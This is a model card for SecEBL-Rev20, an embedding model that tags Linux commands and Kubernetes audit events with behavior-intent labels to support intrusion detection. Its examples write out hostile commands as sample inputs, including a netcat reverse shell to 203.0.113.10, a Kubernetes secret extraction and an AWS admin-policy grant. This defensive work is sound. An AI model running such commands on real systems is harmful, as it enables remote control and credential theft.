Sentence Similarity
sentence-transformers
Joblib
Safetensors
modernbert
security
intrusion-detection
behavior-analytics
intent-recognition
linux
kubernetes
audit-log
text-embeddings-inference
Instructions to use willchen0011/SecEBL with libraries, inference providers, notebooks, and local apps. Follow these links to get started.
- Libraries
- sentence-transformers
How to use willchen0011/SecEBL with sentence-transformers:
from sentence_transformers import SentenceTransformer model = SentenceTransformer("willchen0011/SecEBL") sentences = [ "That is a happy person", "That is a happy dog", "That is a very happy person", "Today is a sunny day" ] embeddings = model.encode(sentences) similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [4, 4] - Notebooks
- Google Colab
- Kaggle
| license: apache-2.0 | |
| base_model: Alibaba-NLP/gte-modernbert-base | |
| library_name: sentence-transformers | |
| pipeline_tag: sentence-similarity | |
| tags: | |
| - security | |
| - intrusion-detection | |
| - behavior-analytics | |
| - intent-recognition | |
| - linux | |
| - kubernetes | |
| - audit-log | |
| - sentence-transformers | |
| # SecEBL-Rev20 | |
| **SecEBL** stands for **Security Event Behavior Labeler**. | |
| SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a | |
| Linux command line or normalized Kubernetes AuditLog event into ranked | |
| behavior-intent labels, so downstream detection can reason about what an actor | |
| is trying to do instead of only matching fixed strings, allowlists, blacklists, | |
| or opaque risk scores. | |
| Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) | |
| ## At A Glance | |
| | Area | Current release summary | | |
| | --- | --- | | |
| | Stable public API | L1 behavior-intent labeling with ranked `top_labels`. | | |
| | Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. | | |
| | Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. | | |
| | Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. | | |
| | Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. | | |
| | L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. | | |
| | Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. | | |
| | Training setup | `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. | | |
| The public examples include a reviewed, publicly releasable subset of the | |
| internal Linux final benchmark plus normalized Kubernetes AuditLog examples: | |
| 10,520 Linux rows across 531 sessions and 144 K8s rows across 46 sessions. They | |
| exist so users can run the model locally and inspect outputs without access to | |
| private telemetry. | |
| The full training corpora, full internal benchmarks, private pressure-stream | |
| rows, and private run logs are not redistributed because parts of them contain | |
| real telemetry or real operational context. | |
| ## First-Time User Path | |
| Use the companion GitHub repository for the runnable code and this Hugging Face | |
| repository for model artifacts: | |
| ```bash | |
| git clone https://github.com/EBWi11/SecEBL.git | |
| cd SecEBL | |
| git lfs install | |
| git clone https://huggingface.co/willchen0011/SecEBL model_artifacts | |
| pip install -e . | |
| scripts/run_examples.sh | |
| ``` | |
| After the script finishes, inspect: | |
| ```text | |
| runs/examples/linux_l1/predictions.jsonl | |
| runs/examples/l2/example_linux_session_results.json | |
| ``` | |
| L1 is the stable behavior-labeling API. It outputs ranked behavior evidence, | |
| not an intrusion verdict. L2 is optional and experimental; it runs only when an | |
| L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available. | |
| ## What This Repository Contains | |
| This Hugging Face repository is the model artifact bundle. | |
| | Path | Purpose | | |
| | --- | --- | | |
| | `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. | | |
| | `semantic_texts.jsonl` | Rev20 semantic label texts used by the L1 retrieval path. | | |
| | `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. | | |
| | `examples/linux/` | Public subset of the internal Linux final benchmark and matching Rev20 labels. | | |
| | `examples/k8s/` | Public normalized Kubernetes AuditLog examples and matching Rev20 labels. | | |
| | `examples/manifest.json` | Public example subset counts and distribution. | | |
| | `rev20_tag_rfc.md` | Rev20 behavior-tag labeling RFC and boundary examples. | | |
| | `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. | | |
| | `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. | | |
| | `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. | | |
| | `LICENSE`, `NOTICE` | Model license and attribution notices. | | |
| This repository does not include the runnable helper scripts. Use | |
| [EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package and | |
| one-command test script. The same public benchmark-subset examples are included | |
| here for convenience. | |
| ## Output Shape | |
| L1 predictions expose ranked `top_labels`: | |
| ```json | |
| { | |
| "observation_id": "event:0", | |
| "command": "nc -e /bin/sh 203.0.113.10 4444", | |
| "top_labels": [ | |
| { | |
| "label_id": "spawn_reverse_shell", | |
| "score": 0.811, | |
| "axis": "execution_and_process" | |
| }, | |
| { | |
| "label_id": "connect_external_service", | |
| "score": 0.488, | |
| "axis": "network" | |
| } | |
| ] | |
| } | |
| ``` | |
| L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection | |
| threshold. `behavior_tags[]` is the field used by training and evaluation label | |
| files. Runtime prediction output is ranked `top_labels`. | |
| ## Why Intent Labels Matter | |
| Traditional IDS pipelines often depend on signatures, rules, allowlists, | |
| blacklists, and low-explainability tabular ML. Those tools still matter, but | |
| they can struggle when legitimate tools are used in suspicious ways, when tool | |
| syntax drifts quickly, or when the same behavior appears in different telemetry | |
| formats. | |
| SecEBL adds an intermediate representation: | |
| ```text | |
| raw security event | |
| -> L1 behavior-intent recognition | |
| -> L2 session reasoning or another downstream detector | |
| -> alert / review / policy | |
| ``` | |
| L1 intentionally does not decide that a single event is an intrusion. It | |
| produces explainable behavior evidence such as `read_credential_material`, | |
| `execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`, | |
| or `query_service_health`. | |
| This is useful for: | |
| - LOLT / living-off-the-land behavior where the tool is legitimate but the | |
| behavior may be suspicious in context. | |
| - Rule-writing lag, where new tool syntax appears faster than signatures can be | |
| maintained. | |
| - Multi-platform telemetry, where Linux commands, Kubernetes audit events, and | |
| future telemetry can share a behavior vocabulary. | |
| - Explainable detection, where an alert should be tied to explicit behavior | |
| labels rather than only an opaque score. | |
| ## Data And Vocabulary | |
| Rev20 is a flat behavior-tag schema. | |
| | Item | Count | | |
| | --- | ---: | | |
| | Top-level behavior groups | 12 | | |
| | Behavior tags | 361 | | |
| Schema groups: | |
| | Group | Tags | | |
| | --- | ---: | | |
| | `observation_and_discovery` | 51 | | |
| | `configuration_and_log_modification` | 12 | | |
| | `filesystem_and_data` | 33 | | |
| | `execution_and_process` | 28 | | |
| | `network` | 51 | | |
| | `identity_auth_and_secrets` | 31 | | |
| | `persistence_services_and_storage` | 27 | | |
| | `kernel_memory_and_tracing` | 14 | | |
| | `package_build_and_source` | 19 | | |
| | `database_and_infrastructure_services` | 33 | | |
| | `containers_and_cloud_native` | 34 | | |
| | `cloud_control_plane` | 28 | | |
| The release baseline was trained from internal Rev20 corpora: | |
| | Corpus | Rows | Unique behavior tags | Notes | | |
| | --- | ---: | ---: | --- | | |
| | Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. | | |
| | Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. | | |
| The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a | |
| conservative executable-name estimate. Common families include shell utilities, | |
| network tools, package/build tools, cloud CLIs, IaC tools, container tooling, | |
| databases, secret stores, and Kubernetes tooling. | |
| ## Training Details | |
| The raw training corpora are not redistributed, but the following details are | |
| documented so readers can understand the model scale and method. | |
| | Item | Value | | |
| | --- | --- | | |
| | Base model | `Alibaba-NLP/gte-modernbert-base` | | |
| | Training objective | `MultipleNegativesRankingLoss` with hard-negative-aware batches | | |
| | Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` | | |
| | Epochs | 128 full-pass epochs | | |
| | Batch size | 112 | | |
| | Precision | `fp32` | | |
| | Steps | 1,062 steps per epoch; 135,936 total optimizer steps | | |
| | Runtime | 58,291 seconds, about 16.2 hours | | |
| | Sequence length | 160 tokens | | |
| | Optimizer schedule | learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` | | |
| Training data scale: | |
| | Training artifact | Count | Notes | | |
| | --- | ---: | --- | | |
| | Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. | | |
| | Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. | | |
| | Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. | | |
| | Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. | | |
| | Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. | | |
| The Linux corpus is intentionally mixed rather than a single synthetic source. | |
| The largest source slices are roughly 36.9k generated rows, 28.5k manually | |
| reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap | |
| rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack | |
| batch rows, plus smaller targeted boundary, miss-review, public-attack, and | |
| high-miss batches. | |
| Token lengths are short enough for a compact encoder. Across the final pair set, | |
| command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than | |
| 0.3% of examples exceed the 160-token training limit. Label-side semantic texts | |
| are p50 40 tokens and p95 62. | |
| Hard negatives were designed in two layers: | |
| - Schema-level negatives: the dataset builder used `schema_hard`, with a | |
| 16-item hard-negative pool and up to 8 negatives per positive before MNRL | |
| batching. These negatives come from semantically nearby Rev20 tags, so the | |
| model is forced to separate labels such as read-vs-search, inspect-vs-modify, | |
| local-vs-remote execution, and similar tool-boundary cases. | |
| - Batch-level negatives: the training loader used hard-negative-aware MNRL | |
| batches. The final run used config | |
| `rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and | |
| placing 2 hard-negative labels near each anchor where possible. | |
| - Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once, | |
| producing 1,766 extra training exposures. These rows target recurring failure | |
| modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries, | |
| no-hit review cases, and post-evaluation miss-review batches. | |
| ## Public Benchmark Subset | |
| This Hugging Face repository includes the same public benchmark examples as the | |
| companion GitHub repository: the Linux benchmark subset under `examples/linux/` | |
| and normalized Kubernetes AuditLog examples under `examples/k8s/`. | |
| | Public artifact | Rows | Sessions | Notes | | |
| | --- | ---: | ---: | --- | | |
| | `examples/linux/example_sessions.jsonl` | 10,520 | 531 | Publicly releasable subset of the internal Linux final benchmark; 2,934 normal-operation rows and 7,586 intrusion rows. | | |
| | `examples/linux/example_gold.rev20.jsonl` | 10,520 | 531 | Matching Rev20 behavior labels; 10,019 labeled rows, 14,807 behavior-label instances, and 349 unique behavior tags. | | |
| | `examples/k8s/example_sessions.jsonl` | 144 | 46 | Public normalized Kubernetes AuditLog examples; 72 normal-operation rows and 72 intrusion rows. | | |
| | `examples/k8s/example_gold.rev20.jsonl` | 144 | 46 | Matching Rev20 behavior labels; 144 labeled rows, 163 behavior-label instances, and 27 unique behavior tags. | | |
| Session-level labels use English enums: `normal_operation` and `intrusion`. | |
| The full internal Linux benchmark remains larger: 12,594 rows, 663 sessions, | |
| and complete 361-tag coverage. | |
| ## Evaluation Snapshot | |
| The full internal benchmark data is not public. The aggregate size, | |
| distribution, and metrics are public so users can understand what the headline | |
| numbers mean. | |
| Evaluation scale: | |
| | Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags | | |
| | --- | ---: | ---: | ---: | ---: | | |
| | Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 | | |
| | K8s evaluation set | 144 | 144 | 163 | 27 / 361 | | |
| | Combined | 12,738 | 12,033 | 17,450 | 361 / 361 | | |
| Retrieval quality: | |
| | Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 | | |
| | --- | ---: | ---: | ---: | ---: | | |
| | Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% | | |
| | K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% | | |
| | Combined | 87.47% | 98.50% | 95.50% | 96.47% | | |
| The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes | |
| complex multi-tag command rows. The K8s result should be read as a small-domain | |
| sanity result rather than broad Kubernetes coverage because the current K8s | |
| corpus is much smaller than the Linux corpus. | |
| Internal Linux benchmark tag cardinality: | |
| | Tags per row | Rows | | |
| | --- | ---: | | |
| | 0 | 705 | | |
| | 1 | 8,829 | | |
| | 2 | 1,567 | | |
| | 3 | 901 | | |
| | 4 | 402 | | |
| | 5 | 139 | | |
| | 6+ | 51 | | |
| Top internal Linux benchmark tags: | |
| | Tag | Count | | |
| | --- | ---: | | |
| | `stage_temporary_path` | 987 | | |
| | `inspect_network_state` | 801 | | |
| | `stage_hidden_path` | 655 | | |
| | `inspect_current_identity` | 578 | | |
| | `read_credential_material` | 551 | | |
| | `inspect_system_state` | 481 | | |
| | `inspect_infrastructure_service` | 390 | | |
| | `query_dns_records` | 372 | | |
| | `enumerate_filesystem` | 365 | | |
| | `search_credentials` | 315 | | |
| ## Example Outputs | |
| These examples show the user-facing L1 output style. Scores are cosine/retrieval | |
| scores after the release prompt profile. The public helper scripts save top | |
| labels in `predictions.jsonl`. | |
| | Event | Top 3 L1 tags | Note | | |
| | --- | --- | --- | | |
| | `nc -e /bin/sh 203.0.113.10 4444` | <code>spawn_reverse_shell</code> 0.811<br><code>connect_external_service</code> 0.488<br><code>spawn_bind_shell</code> 0.451 | `-e` is recognized as reverse-shell execution. | | |
| | `nc -v 203.0.113.10 443` | <code>connect_external_service</code> 0.732<br><code>spawn_reverse_shell</code> 0.503<br><code>create_reverse_tunnel</code> 0.412 | Connection intent ranks above shell-spawn intent. | | |
| | `cat /root/install.log` | <code>read_business_log</code> 0.641<br><code>read_system_log</code> 0.431<br><code>read_workload_logs</code> 0.385 | Log-read semantics dominate. | | |
| | `cat /root/install.conf` | <code>read_infrastructure_config</code> 0.620<br><code>read_system_config</code> 0.612<br><code>read_kernel_parameter</code> 0.336 | Config-read semantics dominate. | | |
| | `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d` | <code>read_cluster_secret</code> 0.730<br><code>decode_data</code> 0.716<br><code>read_credential_material</code> 0.363 | K8s secret extraction and decoding. | | |
| | `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` | <code>grant_cloud_privilege</code> 0.838<br><code>modify_cloud_identity_policy</code> 0.535<br><code>modify_cloud_identity</code> 0.459 | Cloud privilege escalation semantics. | | |
| | `curl -fsS http://127.0.0.1:8080/healthz` | <code>query_service_health</code> 0.840<br><code>inspect_local_kubernetes_cluster</code> 0.459<br><code>inspect_container_runtime</code> 0.383 | Local service health check. | | |
| ## Runtime Performance | |
| SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20 | |
| tag definitions. The serving path embeds the event, embeds or loads tag | |
| definition embeddings, then ranks tags by similarity. | |
| Current single-card CUDA recommendation: | |
| | Setting | Value | | |
| | --- | --- | | |
| | Precision | FP16 | | |
| | Attention | SDPA | | |
| | `max_seq_length` | 160 | | |
| | Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default | | |
| | Sorting | `sort_by=char` | | |
| | Padding | dynamic, no forced pad alignment | | |
| | Output path | GPU tensor output plus GPU top-k | | |
| Measured on an NVIDIA GeForce RTX 5090 32GB spot-check: | |
| | Mode | Throughput | | |
| | --- | ---: | | |
| | Recommended no-cache unique inference, `bs224` | mean 5,308.72 unique cmdlines/s | | |
| | Recommended no-cache latency, `bs224` | about 0.1884 ms per unique cmdline | | |
| | `bs224` repeat range | 5,025.47 - 5,433.78 unique cmdlines/s | | |
| | Best quick-sweep point, `bs384` | 5,378.45 unique cmdlines/s | | |
| Exact raw-event cache lookup was measured separately at mean 1,817,462.76 | |
| rows/s. Cache hits reuse saved L1 top-k results and do not run model inference. | |
| ## L2 Artifact | |
| This repository includes an experimental fitted L2 session scorer so the | |
| companion GitHub `scripts/run_examples.sh` can run the public Linux and K8s L1 | |
| examples, plus Linux example-session scoring, when this model directory is used | |
| as `MODEL_DIR`. | |
| In this release, a **session** is a sequence of events grouped by `session_id`. | |
| L1 labels each event independently. L2 scores the whole session by aggregating | |
| cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions, | |
| and routine-operation context. The L2 output is a session-level verdict such as | |
| `intrusion` or `normal_operation`, not a replacement for per-command behavior | |
| tags. | |
| For compatibility with the released L2 artifact, L2 derives its session | |
| features from cached L1 `top_labels` using an internal selected-tag feature | |
| path. In plain terms, L2 filters the cached ranked labels inside its own feature | |
| builder before session scoring. This does not change L1 prediction output: | |
| users still receive ranked `top_labels`, not a selected `behavior_tags` field. | |
| Runtime L2 does not use raw command text, user names, host names, or session ids | |
| as scoring features. Session ids may appear in private data-prep workflows for | |
| label assignment, but they are not runtime allow/deny lists. | |
| Internal L2 summary: | |
| | Check | Result | | |
| | --- | ---: | | |
| | Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN | | |
| | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions | | |
| | OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall | | |
| The 7M pressure-stream result was measured on real background telemetry plus | |
| embedded synthetic attack sessions. The underlying rows and real session | |
| identifiers are not redistributed. The included L2 artifact is a | |
| research/reproducibility component, not a general production IDS claim. | |
| ## Direct SentenceTransformers Loading | |
| You can load the embedding model directly: | |
| ```python | |
| from sentence_transformers import SentenceTransformer | |
| model = SentenceTransformer("willchen0011/SecEBL") | |
| ``` | |
| Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler: | |
| encode the event, encode or load the Rev20 semantic label texts from | |
| `semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k | |
| labels. For normal use, prefer the companion GitHub helpers because they keep | |
| the prompt profile, semantic text loading, top-k output format, and optional L2 | |
| feature path aligned with this release. | |
| ## Intended Use | |
| - Research and evaluation of security-event behavior labeling. | |
| - Internal security detection, investigation, and triage for systems an | |
| organization owns, operates, administers, or is explicitly authorized to | |
| defend. | |
| - Building session-level risk scoring over SecEBL behavior-label streams. | |
| ## Out Of Scope | |
| - Standalone verdicting on a single event. | |
| - Authorization or policy-compliance decisions without human validation. | |
| - Monitoring systems you are not authorized to defend. | |
| ## License | |
| This Hugging Face repository is released under **Apache License 2.0**. | |
| The base model is `Alibaba-NLP/gte-modernbert-base`, which is also Apache-2.0. | |
| Source code, schemas, public examples, public documentation, helper scripts, | |
| model artifacts, and the experimental L2 artifact are Apache-2.0 unless a file | |
| explicitly states otherwise. | |